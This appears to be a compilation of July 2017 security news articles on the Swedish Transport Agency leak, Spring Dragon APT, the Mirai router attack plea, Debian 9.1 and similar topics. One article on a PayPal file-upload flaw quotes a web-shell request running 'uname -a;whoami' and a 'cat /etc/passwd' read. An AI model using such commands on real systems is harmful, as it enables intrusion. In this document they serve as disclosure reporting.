The availability of the SLocker source code will likely increase the number of samples that will be detected in the wild in the incoming weeks.


Sweden Accidentally Leaks Personal Details of Nearly All Citizens
24.7.2017 thehackernews  BigBrothers

Another day, Another data breach!
This time sensitive and personal data of millions of transporters in Sweden, along with the nation's military secrets, have been exposed, putting every individual's as well as national security at risk.
Who exposed the sensitive data? The Swedish government itself.
Swedish media is reporting of a massive data breach in the Swedish Transport Agency (Transportstyrelsen) after the agency mishandled an outsourcing deal with IBM, which led to the leak of the private data about every vehicle in the country, including those used by both police and military.
The data breach exposed the names, photos and home addresses of millions of Swedish citizen, including fighter pilots of Swedish air force, members of the military's most secretive units, police suspects, people under the witness relocation programme, the weight capacity of all roads and bridges, and much more.
The incident is believed to be one of the worst government information security disasters ever.
Here's what and How it Happened:
In 2015, the Swedish Transport Agency hand over IBM an IT maintenance contract to manage its databases and networks.
However, the Swedish Transport Agency uploaded IBM's entire database onto cloud servers, which covered details on every vehicle in the country, including police and military registrations, and individuals on witness protection programs.
The transport agency then emailed the entire database in messages to marketers that subscribe to it.
And what’s terrible is that the messages were sent in clear text.
When the error was discovered, the transport agency merely thought of sending a new list in another email, asking the subscribers to delete the old list themselves.
If you think the scandal ends there, you are wrong. The outsourcing deal gave IBM staff outside Sweden access to the Swedish transport agency's systems without undergoing proper security clearance checks.
IBM administrators in the Czech Republic were also given full access to all data and logs, according to Swedish newspaper Dagens Nyheter (DN), which analysed the Säpo investigation documents.
According to Pirate Party founder and now head of privacy at VPN provider Private Internet Access Rick Falkvinge, who brought details of this scandal, the incident "exposed and leaked every conceivable top secret database: fighter pilots, SEAL team operators, police suspects, people under witness relocation."
Tons of Sensitive Info Exposed about Both Individuals and Nation's Critical Infrastructures
According to Falkvinge, the leak exposed:
The weight capacity of all roads as well as bridges (which is crucial for warfare, and gives a lot idea about what roads are intended to be used as wartime airfields).
Names, photos, and home addresses of fighter pilots in the Air Force.
Names, photos, and home addresses of everybody in a police register, which are believed to be classified.
Names, photos, and residential addresses of all operators in the military's most secret units that are equivalent to the SAS or SEAL teams.
Names, photos, and addresses of everybody in a witness relocation program, who has been given protected identity for some reasons.
Type, model, weight, and any defects in all government and military vehicles, including their operator, which reveals a much about the structure of military support units.
Although the data breach happened in 2015, Swedish Secret Service discovered it in 2016 and started investigating the incident, which led to the fire of STA director-general Maria Ågren in January 2017.
Ågren was also fined half a month's pay (70,000 Swedish krona which equals to $8,500) after finding her guilty of being "careless with secret information," according to the publication.
What's the worrying part? The leaked database may not be secured until the fall, said the agency's new director-general Jonas Bjelfvenstam. The investigation into the scope of the leak is still ongoing.


Google Rolls-Out Play Protect Services for Android

24.7.2017 securityweek Android

After introducing the product at the Google I/O conference in May, Google has now made its Play Protect security services available to all Android users.

Play Protect was designed to combine various Android security services, including Verify Apps and Bouncer, in a single suite integrated into all devices with Google Play. This, Googls says, will let users benefit from comprehensive protection capabilities without having to search for and download multiple applications on their devices.

The Internet giant already performs tens of billions of application scans every day in an effort to protect the 2 billion active Android devices around the world. According to Google, it can identify risks, discover potentially harmful applications, prevent them from compromising devices, and even remove them from already infected devices when necessary.

Play Protect was designed to scan all applications in Google Play before they are downloaded, but also periodically all apps installed on connected devices. Thus, it can detect harmful behavior even in applications that haven’t been installed via Google Play.

In fact, Play Protect scans and monitors apps from third-party sources continuously, meaning it could detect malicious activities even if they are performed long after the app was installed (some programs hide their behavior by acting normally in the beginning). Potentially harmful apps are disabled and the user is alerted.

“Google Play Protect continuously works to keep your device, data and apps safe. It actively scans your device and is constantly improving to make sure you have the latest in mobile security. Your device is automatically scanned around the clock, so you can rest easy,” Google claims.

A Find My Device service (previously known as Android Device Manager) is also part of Play Protect, allowing users to easily locate, lock, or wipe phones, tablets, and other type of devices that have been lost or stolen. Safe Browsing, the feature that keeps users protected when surfing the web via Chrome on Android, is also included in the suite.

Users looking to customize the Play Protect options on their devices should head to Settings > Google > Security > Play Protect (previously Verify Apps). Play Protect should be available on all devices running Google Play services 11 or above.

Despite Google’s continuous focus on improving Android safety, malicious apps still manage to slip into Google Play and infect millions. To circumvent the company’s protections, cybercriminals hide their malware in fake system updates, mobile games, utility programs, and fake versions of popular streaming apps.


Threat Hunters Analyze Trends in Destructive Cyber-Attacks

24.7.2017 securityweek Cyber

The three primary trends in the incidence of destructive cyber-attacks are that they are increasing; they are usually state-sponsored; and they do not, apart from a few rare occurrences, involve anything more than basic tools. Potentially more concerning for private industry, however, is a lack of concern over what, in kinetic warfare, would be termed 'collateral damage'.

Cybereason, a Boston MA-based threat hunting firm, has analyzed destructive cyber-attacks from the 1982 software-instigated explosion in a Siberian pipeline to the recent NotPetya and Industroyer attacks. Cybereason's conclusions are not reassuring for industry.

A graph of attack sophistication over time shows two primary characteristics. The majority of attacks have occurred since 2012, and the majority of attacks are (relatively) unsophisticated.

The three sophisticated attacks are a 1998 US military attack against Serbian air defense systems; the Stuxnet attack against the Iranian nuclear program in 2010; and the CrashOverride/Industroyer attack against the Ukrainian power grid in 2016. All three have one common characteristic: they are thought to be nation-state attacks against critical or military infrastructure.

Destructive Cyber Attack

A clear majority of unsophisticated attacks are targeted against private industry. Cybereason sees little sign of this being contained by government interaction, and fears that it is likely to increase: it is, in effect, uncontrolled cyber war in all but official classification.

Some of these attacks are likely to have been nation-state actors testing out their cyber-weapons. The 2015 attack against the French television station TV5Monde is thought to be one; where the UK intelligence community concluded that it was likely an attempt to test forms of cyber-weaponry as part of an increasingly aggressive posture by Russia, acting through APT28/Fancy Bear.

Other attacks are purely political, including several attacks by Iranian hackers against Saudi oil production. Some could be considered 'national' political/revenge, such as the North Korean Dark Seoul attack against South Korean television and banking in 2013, and against Sony Pictures in 2014.

Cybereason argues that government is unable -- perhaps unwilling -- to counter this threat.

"There is no incentive for nations to stop this behavior," Cybereason explains in its report (PDF). "They can signal displeasure, retaliate for another's actions, or conduct disruptive covert operations with impunity. The relative ease in striking internationally that the Internet provides combined with the comparative lack of retribution has created an environment where nations will continue to experiment and grow increasingly bold in their attacks."

The problem for private industry, however, is the fundamental difference between kinetic and cyber warfare. "The idea that a major power would threaten the critical infrastructure of another major power over an information operation would be outrageous if the threat was carried out via kinetic means."

But governments are reluctant to respond in the cyber domain as they would in the kinetic domain for fear of escalation ultimately leading to the transition from cyber to real world conflict. The result is that cyber collateral damage is largely accepted by governments; and that collateral damage is frequently private industry.

"With no ability, or even intent to dissuade destructive attacks from nation states," warns Cybereason, "the private sector is paying the ultimate price. They are most often the victims of these attacks because they are both less secure than government networks and also have been largely deemed a 'safe' target from a retaliation standpoint."

For this reason, Cybereason believes "that the cluster of relatively low sophisticated [nation-state] attacks is likely to continue grow year over year. The victims will likely continue to be non-government institutions that for some reason or other present a useful target for advancing a hostile nation's interests."

It is equally worried, however, that similar tactics will be adopted by non-state attackers.

"Currently, DDoS is the easiest and most leveraged tool for hacktivists and those looking to disrupt specific entities," the security firm says. "However, as more destructive tools continue to be used and society continues to become numb to the announcements of new attacks, cybercrime and hacktivists will increasingly be willing to move into this space. The ability to have a larger impact combined with the ability to increase obfuscation by not only damaging the information systems but also wiping forensic evidence will become even more enticing for those who want to expand their business model."

Put simply, Cybereason believes that private sector attackers will increasingly use destruction as part of their methodology. The implication, and advice from Cybereason, is that the private sector defenders need to factor aggressive destruction into their risk management.

It warns against relying on 'deterrence by denial', whether this is a government induced threat of retaliation or private sector 'hacking back'. Government will be reluctant to instigate the former, while the latter "is only going to lead to more hacking, less secure networks, and in general a shorter and more brutal life for corporation's network security."

It recommends two courses of action for the private sector. The first is to understand and recognize where it might be a target for "a nation state lashing out" now, and possibly destructive hacktivist attacks in the future. This implies that effective disaster recovery can no longer be considered a luxury but an absolute necessity. The second is to switch from reactive defense to proactive threat-hunting within the network, in order to detect and block destructive attacks before they can be triggered by the adversary.

In June 2017, Cybereason announced that it had raised $100 million in Series D funding, increasing the total investment in the firm to $189 million.


Over 600 Malware Samples Linked to Chinese Cyberspy Group

24.7.2017 securityweek Virus

A China-linked cyber espionage group tracked by security firms as Lotus Blossom, Elise, Esile and Spring Dragon has used more than 600 malware samples in its attacks over the past years, according to Kaspersky Lab.

Spring Dragon has been around since at least 2012, but there is some evidence suggesting that it may have been active since 2007. The state-sponsored threat group has mainly targeted military and government organizations in Southeast Asia.

Kaspersky Lab learned recently from a research partner in Taiwan of new attacks launched by the group. Data collected by the security firm indicates that the APT actor has also targeted political parties, universities and other educational institutions, and companies in the telecommunications sector.

The cyberspies appear to focus on countries around the South China Sea, including Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia and Thailand.

The threat actor has been using a wide range of tools, including backdoors that can download other files to the compromised machine, upload files to a remote server, and execute files and commands. Kaspersky Lab has identified a total of more than 600 malware samples used over the past years.

According to the security firm, the malware leverages a command and control (C&C) infrastructure of more than 200 unique IP addresses and domains, with each sample using hardcoded campaign codes and custom C&C addresses.

The C&C servers used by Spring Dragon are located in several countries, but roughly two-thirds are located in Hong Kong and the United States. Some servers have also been spotted in Germany, China and Japan.

Based on malware compilation timestamps, which Kaspersky believes have not been altered, the attackers appear to be located in the GMT+8 timezone, which corresponds to China, Indonesia, Malaysia, Mongolia, Singapore, Taiwan, the Philippines and Western Australia.

The malware compilation timestamps also suggest that the members of the group either work in two shifts, or Spring Dragon malware has been compiled by two different groups, one of which may be located in Europe.

“The number of malware samples which we managed to collect (over 600) for the group surpassed many others, and suggests an operation on a massive scale. It’s possible that this malware toolkit is offered in specialist public or private forums to any buyers, although, to date, we haven’t seen this,” explained Kaspersky’s Noushin Shabab.


Internet Bug Bounty Project Receives $300,000 Donation

24.7.2017 securityweek Security

The Internet Bug Bounty (IBB), a project whose goal is to make the Web safer by rewarding white hat hackers who find vulnerabilities in core Internet infrastructure and open source software, announced on Friday that it has secured a $300,000 donation.

Facebook, GitHub and the Ford Foundation, one of the world’s largest charitable organizations, have each donated $100,000 to the IBB. With their donation, GitHub and the Ford Foundation have joined existing sponsors, Facebook, Microsoft and HackerOne.

The IBB rewards researchers who find vulnerabilities in OpenSSL, Nginx, Apache httpd, Perl, PHP, Python, Ruby, Flash, Ruby on Rails, Phabricator, Django, RubyGems and other widely used Internet technologies.

Since its launch in November 2013, the IBB has awarded more than $600,000 for over 600 vulnerabilities found by bounty hunters. This includes over $150,000 awarded last year and $45,000 that hackers decided to donate to charities and nonprofit organizations, such as the Electronic Frontier Foundation (EFF), Hackers for Charity, and the Freedom of the Press Foundation.

Critical security holes such as ImageTragick, Heartbleed and Shellshock earned researchers $7,500, $15,000 and $20,000, respectively.

With the newly raised funds, the IBB plans on expanding the scope of the bug bounty program by adding a new category for flaws in popular data parsing libraries, which are considered increasingly risky. The expansion will also cover technologies that “serve as the technical foundation of a free and open Internet, such as OpenSSL.”

“At Ford Foundation we believe that a secure, free and open internet is critical in the fight against inequality,” said Michael Brennan, Ford Foundation’s technology program officer on the Internet Freedom team. “The open source infrastructure of the internet is part of a public commons that we are committed to help maintain and draw attention to. A necessary part of this maintenance is recognizing and rewarding those who uncover critical vulnerabilities in freely available code that we all rely upon.”


Briton Pleads Guilty to Mirai Attacks in German Court

24.7.2017 securityweek BotNet

A British man pleaded guilty last week in a German court to launching a cyberattack that resulted in more than one million customers of telecommunications provider Deutsche Telekom experiencing Internet disruptions.

German media has identified the 29-year-old man as “Peter Parker” and “Spiderman,” online monikers linked to domains used to coordinate some attacks powered by the notorious Mirai malware. He was also identified by Handelsblatt as Daniel K.

A blog post published earlier this month by security blogger Brian Krebs revealed that the suspect is a British man named Daniel Kaye and the hacker known online as “BestBuy.” He has also been tied to the nickname “Popopret,” but it’s unclear if it’s the same person or a partner of BestBuy.

Krebs found links between Kaye, a massive Mirai botnet that enslaved a large number of Internet of Things (IoT) devices, and a piece of malware named GovRAT.

Reports of BestBuy’s apprehension surfaced in February when German police announced that a man suspected of carrying out the November 2016 attack on Deutsche Telekom had been arrested by the U.K. National Crime Agency (NCA) at a London airport based on a warrant issued by authorities in Germany.

According to German media reports, the 29-year-old pleaded guilty on Friday in the Regional Court of Cologne, claiming that he regretted his actions. He said his main motive was money – he was about to marry his fiance and he wanted a good start to married life. It’s worth mentioning that the social media profiles for Daniel Kaye uncovered by Krebs also showed that he had been engaged to be married.

The hacker told the court that Deutsche Telekom was not the main target of his attack. Instead, he used the Mirai malware to hijack routers – including ones belonging to Deutsche Telekom customers – and other types of devices, which he abused to launch distributed denial-of-service (DDoS) attacks. He claimed a telecommunications firm in the West African country of Liberia paid him $10,000 to attack a competitor.

At the time of his arrest, German authorities said the suspect faced between 6 months and 10 years in prison. He may be sentenced on July 28.


New Debian 9.1 release includes 26 security fixes for 55 packages
24.7.2017 securityaffairs
Vulnerebility

The Debian Project announced the Debian 9.1 GNU/Linux, a version that brings numerous updates and addresses many security issues.
The Debian Project announced the new Debian 9.1 release that includes 26 security fixes. The list of fixed problems includes the Heimdal Kerberos man-in-the-middle vulnerability, a 20 years-old vulnerability in Kerberos that was parched this week for both Microsoft and Linux distros.

“The Debian project is pleased to announce the first update of its stable distribution Debian 9 (codename stretch). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.” states the announcement.

“Please note that the point release does not constitute a new version of Debian 9 but only updates some of the packages included. There is no need to throw away old stretch media. After installation, packages can be upgraded to the current versions using an up-to-date Debian mirror.”

Debian 9.1 isn’t a new Debian version or bring new features, it only updates the existing packages with a special focus on cyber security.

Debian 9.1 also addresses security issues in Apache, and includes a number of Linux updates and patches for OpenVPN flaws (including recently fixed CVE-2017-7508, CVE-2017-7520, CVE-2017-7520).

The new release fixes the CVE-2017-1000381 in the c-ares function “ares_parse_naptr_reply()“, it also addresses several issues in thedwarfutils link shortener and in libquicktime.

“The c-ares function `ares_parse_naptr_reply()`, which is used for parsing NAPTR responses, could be triggered to read memory outside of the given input buffer if the passed in DNS response packet was crafted in a particular way.” states the description for the CVE-2017-1000381 flaw.

Debian 9.1

For updating all packages run the following command:

apt-get update && apt-get upgrade
For downloading Debian 9.1 images, refer one of the mirrors at the following URL:

https://www.debian.org/mirror/list


Spring Dragon – Updated Activity
24.7.2017 Kaspersky 
APT

Spring Dragon is a long running APT actor that operates on a massive scale. The group has been running campaigns, mostly in countries and territories around the South China Sea, since as early as 2012. The main targets of Spring Dragon attacks are high profile governmental organizations and political parties, education institutions such as universities, as well as companies from the telecommunications sector.

In the beginning of 2017, Kaspersky Lab became aware of new activities by an APT actor we have been tracking for several years called Spring Dragon (also known as LotusBlossom).

Information about the new attacks arrived from a research partner in Taiwan and we decided to review the actor’s tools, techniques and activities.

Using Kaspersky Lab telemetry data we detected the malware in attacks against some high-profile organizations around the South China Sea.

Spring Dragon is known for spear phishing and watering hole techniques and some of its tools have previously been analyzed and reported on by security researchers, including Kaspersky Lab. We collected a large set (600+) of malware samples used in different attacks, with customized C2 addresses and campaign codes hardcoded in the malware samples.

Spring Dragon’s Toolset

The threat actor behind Spring Dragon APT has been developing and updating its range of tools throughout the years it has been operational. Its toolset consists of various backdoor modules with unique characteristics and functionalities.

The threat actor owns a large C2 infrastructure which comprises more than 200 unique IP addresses and C2 domains.

The large number of samples which we have managed to collect have customized configuration data, different sets of C2 addresses with new hardcoded campaign IDs, as well as customized configuration data for creating a service for malware on a victim’s system. This is designed to make detection more difficult.

All the backdoor modules in the APT’s toolset are capable of downloading more files onto the victim’s machine, uploading files to the attacker’s servers, and also executing any executable file or any command on the victim’s machine. These functionalities enable the attackers to undertake different malicious activities on the victim’s machine.

A detailed analysis of known malicious tools used by this threat actor is available for customers of Kaspersky Threat Intelligence Services.

Command and Control (C2) Infrastructure

The main modules in Spring Dragon attacks are backdoor files containing IP addresses and domain names of C2 servers. We collected and analyzed information from hundreds of C2 IP addresses and domain names used in different samples of Spring Dragon tools that have been compiled over the years.

In order to hide their real location, attackers have registered domain names and used IP addresses from different geographical locations. The chart below shows the distribution of servers based on geographical location which the attackers used as their C2 servers.

Distribution chart of C2 servers by country

More than 40% of all the C2 servers used for Spring Dragon’s operations are located in Hong Kong, which hints at the geographical region (Asia) of the attackers and/or their targets. The next most popular countries are the US, Germany, China and Japan.

Targets of the Attacks

As was mentioned, the Spring Dragon threat actor has been mainly targeting countries and territories around the South China Sea with a particular focus on Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia and Thailand.

Our research shows that the main targets of the attacks are in the following sectors and industries:

High-profile governmental organizations
Political parties
Education institutions, including universities
Companies from the telecommunications sector
The following map shows the geographic distribution of attacks according to our telemetry, with the frequency of the attacks increasing from yellow to red.

Geographic map of attacks

Origin of the Attacks

The victims of this threat actor have always been mainly governmental organizations and political parties. These are known to be of most interest to state-supported groups.

The type of malicious tools the actor has implemented over time are mostly backdoor files capable of stealing files from victims’ systems, downloading and executing additional malware components as well as running system commands on victims’ machines. This suggests an intention to search and manually collect information (cyberespionage). This activity is most commonly associated with the interests of state-sponsored attackers.

As a routine analysis procedure, we decided to figure out the attacker’s possible time zone using the malware compilation timestamps from a large number of Spring Dragon samples. The following diagram shows the frequency of the timestamps during daytime hours. The timestamps range from early 2012 until now and are aligned to the GMT time zone.

Assuming the peak working hours of malware developers are the standard working day of 09:00-17:00, the chart shows that compilation took place in the GMT+8 time zone. It also suggests that either there is a second group working another shift in the same time zone or the attackers are cross-continental and there is another group, possibly in Europe. The uneven distribution of timestamps (low activity around 10am, 7-8pm UTC) suggests that the attackers didn’t change the timestamps to random or constant values and they might be real.

Histogram of malware files’ timestamps

Conclusions

Spring Dragon is one of many long-running APT campaigns by unknown Chinese-speaking actors. The number of malware samples which we managed to collect (over 600) for the group surpassed many others, and suggests an operation on a massive scale. It’s possible that this malware toolkit is offered in specialist public or private forums to any buyers, although, to date, we haven’t seen this.

We believe that Spring Dragon is going to continue resurfacing regularly in the Asian region and it is therefore worthwhile having good detection mechanisms (such as Yara rules and network IDS signatures) in place. We will continue to track this group going forward and, should the actor resurface, we will provide updates on its new modus operandi.


EU digital chief Andrus Ansip announced its plans to improve cyber security in EU
24.7.2017 securityaffairs Cyber

EU digital chief Andrus Ansip announced new measures to improve EU cyber security, including new offices to certify cybersecurity of technology products.
The EU digital chief Andrus Ansip announced his plan to set up a new office to certify the level of cyber security implemented in technology products.

The European Commission vice-president is thinking of a network of cybersecurity offices, so-called centers of excellence, spread across the states of the Union that will be focused on certifying the cyber security measures implemented by products.

“European products and cybersecurity products are not able, only some of them are able, to compete in the world market. We have to pay much more attention to this,” Ansip explained.

Andrus Ansip ✔ @Ansip_EU
International cooperation, large-scale exercises, R&D all essential to strengthen #cybersecurity @ccdcoe. More centres of excellence needed.
12:34 PM - 13 Jul 2017 · Tallinn, Estonia
24 24 Retweets 34 34 likes
Twitter Ads info and privacy
In September, Ansip will present new measures on cybersecurity certification, including a system to grade products based on their security features.

“The European Commission is getting ready to propose new legislation to protect machines from cybersecurity breaches, signaling the executive’s growing interest in encouraging traditional European manufacturers to build more devices that are connected to the internet.” reported website www.euractiv.com.
Ansip also added that in September there will be an updated EU cyber security strategy in order to improve the ability of European organizations to respond to attacks.

EU digital chief Andrus Ansip

Ansip described the EU as a scenario where most countries don’t have resources to repel cyber attacks, for this reason, it is necessary to improve cooperation and the information sharing.

“Just in five EU member states we have 24/7 capabilities when we are talking about national CERTs,” Ansip said.


Hacker BestBuy pleads guilty to hijacking more than 900k Deutsche Telekom routers
24.7.2017 securityaffairs Hacking

The hacker BestBuy pleaded guilty in court on Friday to hijacking more than 900,000 routers from the network of Deutsche Telekom
The notorious hacker BestBuy, also known as Popopret, pleaded guilty in court on Friday to hijacking more than 900,000 routers from the network of Deutsche Telekom. The 29-year-old man, whom name wasn’t revealed by authorities. used a custom version of the Mirai IoT malware.

bestbuy

Earlier July the popular investigator Brian Krebs announced to have discovered the real BestBuy’s identity. according to the experts, the hacker is the Briton Daniel Kaye.

BestBuy was also known as the author of the GovRAT malware, he offered the source code of the RAT, including a code-signing digital certificate, for nearly 4.5 Bitcoin on the TheRealDeal black market.

German authorities referenced the man as Spiderman which is the name he used to register the domain names that the hacker used as C&C for his botnet.

According to the German website FutureZone.de, Deutsche Telekom estimated that the losses caused by the cyber attack were more than two million euros.

BestBuy targeted the routers in late November 2016 with the intent to recruit them in its botnet that was offered as a DDoS for hire service, but accidentally the malicious code variant he used triggered a DoS condition in the infected devices.

“The hacker admitted in court that he never intended for the routers to cease functioning. He only wanted to silently control them so he can use them as pawns in a DDoS botnet. ” wrote Bleepingcomputer.com.

Early December 2016, the man used another flawed version of Mirai that caused the same widespread problem in UK where more than 100,000 routers went offline. The routers belonged to Kcom, TalkTalk, a UK Postal Office, TalkTalk ISPs.

BestBuy was arrested in late February 2017 by the UK police at the London airport, then he was extradited to Germany to face charges in a German court in Cologne.

On July 21, the hacker BestBuy pleaded guilty, according to German media the man explained that he was hired by a Liberian ISP to carry out DDoS attacks on local competitors.

The hacker said the Liberian ISP paid him $10,000 to hit its competitors.

BestBuy’s sentencing hearing is scheduled July 28, the man faces up to ten years in the jail.


Worst known governmental leak ever affected the Swedish Transport Agency. Homeland security at risk
24.7.2017 securityaffairs BigBrothers

Worst known governmental leak ever affected the Swedish Transport Agency, data includes records of members of the military secret units.
Sweden might be the scenario for the worst known governmental leak ever, the Swedish Transport Agency moved all of its data to “the cloud,” but it transferred it to somebody else’s computer.

The huge trove of data includes top secret documents related to the fighter pilots, SEAL team operators, police suspects, people under witness relocation.

“The responsible director has been found guilty in criminal court of the whole affair, and sentenced to the harshest sentence ever seen in Swedish government: she was docked half a month’s paycheck.” wrote

Full data of top-secret governmental individuals, including photo, name, and home address, was leaked.

Director General Maria Ågren in Sweden was fined half a month’s salary in a very short trial.

Further investigation in the governmental data leak revealed that the Swedish Transport Agency moved all its data to “the cloud”, as managed by IBM, two years ago, but suddenly the Director General of the Transport Agency, Maria Ågren, was quickly retired from her position in January 2017.

On July 6 it was disclosed the news that the Director was found guilty of exposing classified information in a criminal court of law.

“But on July 6th, she is known to be secretly investigated to have cleared confidential information. According to the Security Unit for Security Objectives, the data may damage the security of the country. She is ordered to pay 70,000 kronor in daily fines.” reported the website SvtNyHeater.se.

“Among other things, the entire Swedish database of driving license photos has been available to several Czech technologies, which have not been tested for security. This means that neither the SÄPO nor the Transport Agency had control over the persons who handled the information that could be said to damage the security of the country.“

Leaked data included information related to people in the witness protection program and similar programs. This information was wrongly included in the register distributed outside the Agency as part of a normal procedure. Another unacceptable mistake was discovered by the investigators when a new version without the sensitive identities was distributed, the Agency did not instruct recipients of destroying the old copy.

“Last March, the entire register of vehicles was sent to marketers subscribing to it. This is normal in itself, as the vehicle register is public information, and therefore subject to Freedom-of-Information excerpts.” continues the Swedish website. “What was not normal were two things: first, that people in the witness protection program and similar programs were included in the register distributed outside the Agency, and second, when this fatal mistake was discovered, a new version without the sensitive identities was not distributed with instructions to destroy the old copy. Instead, the sensitive identities were pointed out and named in a second distribution with a request for all subscribers to remove these records themselves. This took place in open cleartext e-mail.”

Swedish Transport Agency
Sensitive data on Swedish vehicles was released to companies with no security clearance. Credit: Jonas Ekströmer/TT

Leaked information is precious data for a foreign government in an Information warfare scenario, data includes records of fighter pilots in the Air Force, policemen, and members of the military’s most secret units.

The archive also includes any kind of information about any government and military vehicle, including their “operator, which says a ton about the structure of military support units;”

The PrivacyNewsOnline confirmed that the governmental data leak is still ongoing and that it can be expected to be fixed “maybe this fall”.

“Much of the available analysis of the leak is still in the form of fully-redacted documents from the Security Police and similar agencies.” concluded the news agency.


Expert exploited an unrestricted File Upload flaw in a PayPal Server to remotely execute code
24.7.2017 securityaffairs
Exploit

The security researcher Vikas Anil Sharma exploited an unrestricted File Upload vulnerability in a PayPal Server to remotely execute code.
The security researcher Vikas Anil Sharma has found a remote code execution vulnerability in a PayPal server.

The expert was visiting the PayPal Bug Bounty page using the Burp software, below the response obtained opening the page http://paypal.com/bugbounty/.

PayPal server hack

The expert focused his analysis on the list of PayPal’s domains mentioned in “Content Security Policy:” Response Header, in particular, the “https://*.paypalcorp.com.”

In this first phase, the hacker was interested in finding as much possible valid sub domains to exploit in the attack, tools like Subbrute , Knockpy , enumall, are useful when performing such kind of analysis.

“these are the tools which i normally use , but being lazy on the weekend i made use of VirusTotal this time to enumerate the sub domains you can get the list here :

https://www.virustotal.com/en/domain/paypalcorp.com/information/

Copied the subdomain’s list locally & ran “dig -f paypal +noall +answer” to checkout where all the subdomains are actually pointing to in a neat way” wrote the researcher.

The expert noticed that the domain “brandpermission.paypalcorp.com” was pointing to “https://www.paypal-brandcentral.com/” that is a site hosting an Online Support Ticket System for PayPal Vendors, Suppliers, and Partners where they request for PayPal Brand Permissions.

The website allows users to upload the mockups of the logos and any graphics related to the brand along. The expert decided to create a ticket by uploading a simple image and analyze the folder destination of the picture.

“So, I first created a ticket by uploading a simple image file named “finished.jpg” which got stored as ” finished__thumb.jpg ” in directory :

“/content/helpdesk/368/867/finishedthumb.jpg” “finished _thumb.jpg” was the new file created in the directory “/867/” i quickly checked whether the actual file which we uploaded exists in the directory or not, luckily (You’ll know why later in the post ) “finished.jpg” also existed in the same directory. Cool stuff ;)” continue the bug hunter’s post.

Vikas discovered that the above link includes the ticket number, in the specific case the number of the ticket he has created is “368,” meanwhile “867” is the folder’s id where all the files related to the tickets are stored, including the Mockup files.

The researcher created a new ticket and discovered that ticket id and file id numbers are generated in serial manner. The expert uploaded a “.php” extension file instead of an image and discovered that the application did not validate file type, content, etc.

“As soon as i saw 302 Response , i ran towards opening the ticket & doing a simple right click copy link shit like i was able to do when uploading a image file . But,here in this case if you upload a php file as mock up you can’t see the path of the php file uploaded only thing which is visible is the ticket number.” wrote the expert.

Differently, from the uploading of image files, the expert noticed that it was not possible to discover the folder used to store mockup files.

The expert uploaded a file named success.php,” so for a similarity with the image uploading, he assumed that the file was stored as the success_thumb.php.

At this point, he decided to brute force the folder id for files.

PayPal server hack

Once discovered the folder id for files, the researcher tried to execute the code:
https://www.paypal-brandcentral.com/content/_helpdesk/366/865/success.php?cmd=uname-a;whoami

“Some cat+/etc/passwd magic to make myself beleive that i have actually found a RCE ;)” he wrote.

PayPal server 3

Below the timeline for the vulnerability:

Jul 08, 2017 18:03 – Submitted
Jul 11, 2017 18:03 – Fixed


The UK continues to grant the export of surveillance equipment to countries like Turkey
24.7.2017 securityaffairs BigBrothers

According to the UK’s Department for International Trade, the country granted a license to export surveillance equipment to Turkey earlier this year.
The UK continues to be one of the most active countries involved in the trade of surveillance technology. British firms continue to export surveillance systems ranging from internet mass surveillance equipment to-catchers.
Surveillance equipment

According to the UK’s Department for International Trade, the country granted a license to export surveillance equipment to Turkey earlier this year, exactly while the Turkish Government for International Trade, the country granted a license to export surveillance equipment to Turkey earlier this year, exactly while the Turkish Government was conducting a severe repression against opposites, dissidents, journalists and human rights advocates.

Turkey today continues to be the country that arrests more journalists than any other state worldwide. Last week, a Turkish court ordered the arrest of Amnesty’s Turkey director along with other human rights activists.

While the UK government granted the above license export, the situation in Turkey became particularly worrying. On December, the Turkish authorities investigated more than 10000 individuals over online terror activities. The suspects were accused of being responsible for the sharing of material and post against government officials.

The Turkish Government applied restrictions on the Tor anonymity network, and more in general, on all VPN services, that could be used to avoid censorship.

The Turkish authorities questioned more than 3,000 people from June to December 2016, 1,656 of them have been arrested.

The Government dismissed 4,400 public servants, while Human Rights Watch claimed the Turkish government jailed members of the democratic opposition.

We cannot ignore that Turkey is under the constant threat of the terrorist organization due to its Geographic location.

A Department for International Trade spokesperson told Motherboard in an email, “The UK government takes its defence export responsibilities very seriously and operates one of the most robust export control regimes in the world.” The spokesperson said the UK examines each application on a case-by-case basis, and draws from NGO reports and other resources. “We have suspended or revoked licences when the level of risk changes and we constantly review local situations.”

I personally believe that is absurd that UK, and any other Government, still provides surveillance equipment to any states that don’t respect human rights.


THN Weekly Roundup — 10 Most Important Stories You Shouldn't Miss
23.7.2017 thehackernews Mobil
Here we are with our weekly roundup, briefing this week's top cyber security threats, incidents and challenges.
This week has been very short with big news from shutting down of two of the largest Dark Web marketplaces and theft of millions of dollars in the popular Ethereum cryptocurrency to the discovery of new Linux malware leveraging SambaCry exploit.
We are here with the outline of this week's stories, just in case you missed any of them. We recommend you read the entire thing (just click 'Read More' because there's some valuable advice in there as well).
Here's the list of this Week's Top Stories:
1. Feds Shuts Down AlphaBay and Hansa Dark Web Markets — Dream Market Under Suspicion
On Thursday, Europol announced that the authorities had shut down two of the largest criminal Dark Web markets — AlphaBay and Hansa — in what's being called the largest-ever international operation against the dark web's black market conducted by the FBI, DEA and Dutch National Police.
Interestingly, the federal authorities shut down AlphaBay, but before taking down Hansa market, they took control of the Dark Web market and kept it running for at least a month in an effort to monitor the activities of its visitors, including a massive flood of Alphabay refugees.
After the shutdown of both AlphaBay and Hansa, Dream Market has emerged as the leading player, which has been in business since 2013, but it has now been speculated by many dark web users that Dream Market is also under police control.
For detailed information — Read more.
2. New Ransomware Threatens to Send Your Internet History to All Your Friends
After WannaCry and Petya ransomware outbreaks, a new strain of ransomware has been making the rounds on the Google Play Store in bogus apps, which targets Android mobile phone users.
Dubbed LeakerLocker, instead of encrypting files on your device, this Android ransomware secretly collects personal images, messages and browsing history and then threatens to share them with your contacts if you don't pay $50 (£38).
For more detailed information on the LeakerLocker ransomware — Read more.
3. New CIA Leaks — Smartphone Hacking and Malware Development

WikiLeaks last week published the 16th batch of its ongoing Vault 7 leak, revealing the CIA's Highrise Project that allowed the spying agency to stealthy collect and forwards stolen data from compromised smartphones to its server through SMS messages.
This week, the whistleblowing organisation revealed about a CIA contractor — Raytheon Blackbird Technologies — who was responsible for analysing advanced malware and hacking techniques being used in the wild by cyber criminals.
For more detailed information on Highrise Project and its contractor Raytheon Blackbird Technologies — Read More.
4. Three Back-to-Back Multi-Million Dollar Ethereum Heist in 20 Days
